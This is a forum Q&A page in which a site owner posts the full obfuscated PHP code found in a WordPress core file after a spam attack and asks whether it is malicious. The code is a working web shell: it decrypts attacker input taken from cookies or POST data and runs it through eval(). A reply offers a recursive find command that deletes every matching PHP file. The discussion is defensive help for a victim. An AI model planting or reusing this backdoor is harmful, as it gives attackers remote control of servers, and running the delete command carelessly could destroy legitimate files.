CODEWITHSUNDEEP
phplinuxservermalwarevirus
Sleeking
Sleeking

Reputation: 29

Malware uploaded on Server

I am requesting assistance/ advice in context of a recent attack I had launched at my sites... this attack essentially is spamming my email accounts to a great deal I also have some suspicious files I am skeptical on which I would appreciate a second eye.I have removed the main spamming scripts successfully but would like to understand if this file wp-includes/Text/Diff/diff16.php is native or foreign

Also because of the sheer amount of spam how do I clear my outgoing mail on Linux which has bogged down my server and took up so much space?

Below is the suspicious code on diff16.php

<?php $GLOBALS['h8d181c'] = "\x3e\x2d\x2f\x72\x40\x50\x2c\x21\x78\x42\x47\x60\x49\x52\x7d\x6d\x24\x34\x33\x3b\x54\x6e\x4f\x71\x5c\x35\x22\x6f\x20\x73\x26\x5e\x30\x6c\x37\x9\x43\x2b\x5b\x36\x27\x56\x7b\x6a\x3d\x70\x3a\x5d\x59\x44\x25\x4b\x55\x39\x66\x7a\x64\x51\x7e\x32\xa\x45\x5a\x58\x7c\x31\x57\x4d\x41\x68\x67\x69\x74\x77\x61\x29\x53\x38\x4a\x2a\x4c\x63\x65\x28\xd\x76\x79\x6b\x3f\x46\x2e\x48\x5f\x62\x4e\x23\x3c\x75";
$GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][3];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]] = $GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]] = $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]] = $GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]] = $GLOBALS['h8d181c'][86].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] = $_POST;
$GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] = $_COOKIE;
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70], NULL);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29], 0);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82], 0);
@$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]](0);

$rb00 = NULL;
$c174 = NULL;

$GLOBALS[$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][32];
global $e57c7;

function h114d($rb00, $n06f3)
{
    $t89f0c4 = "";

    for ($p89c=0; $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00);)
    {
        for ($b8a92b=0; $b8a92b<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($n06f3) && $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00); $b8a92b++, $p89c++)
        {
            $t89f0c4 .= $GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($rb00[$p89c]) ^ $GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($n06f3[$b8a92b]));
        }
    }

    return $t89f0c4;
}

function y26e2($rb00, $n06f3)
{
    global $e57c7;

    return $GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($rb00, $e57c7), $n06f3);
}

foreach ($GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] as $n06f3=>$g476b4c9)
{
    $rb00 = $g476b4c9;
    $c174 = $n06f3;
}

if (!$rb00)
{
    foreach ($GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] as $n06f3=>$g476b4c9)
    {
        $rb00 = $g476b4c9;
        $c174 = $n06f3;
    }
}

$rb00 = @$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]]($GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00), $c174));
if (isset($rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]]) && $e57c7==$rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]])
{
    if ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][71])
    {
        $p89c = Array(
            $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85] => @$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]](),
            $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][85] => $GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][90].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][65],
        );
        echo @$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]]($p89c);
    }
    elseif ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][82])
    {
        eval($rb00[$GLOBALS['h8d181c'][56]]);
    }
    exit();
}

Upvotes: 0

Views: 221

Answers (1)

Jakub Němec
Jakub Němec

Reputation: 5

i'm still trying to find out how to prevent these files from appearing on my server, yet i'm able to remove them at least, here is a oneliner that might be of help:

find . -type f -name "*.php" -exec fgrep -m 1 -F "\$GLOBALS[\$GLOBALS[" {} \; -delete

it basically crawls the current directory (and subdirectories), searches for files with such code and removes them. (perhaps you want to try it first without the -delete directive to ensure you're not removing any files that should be kept.)

Upvotes: 1

Related Questions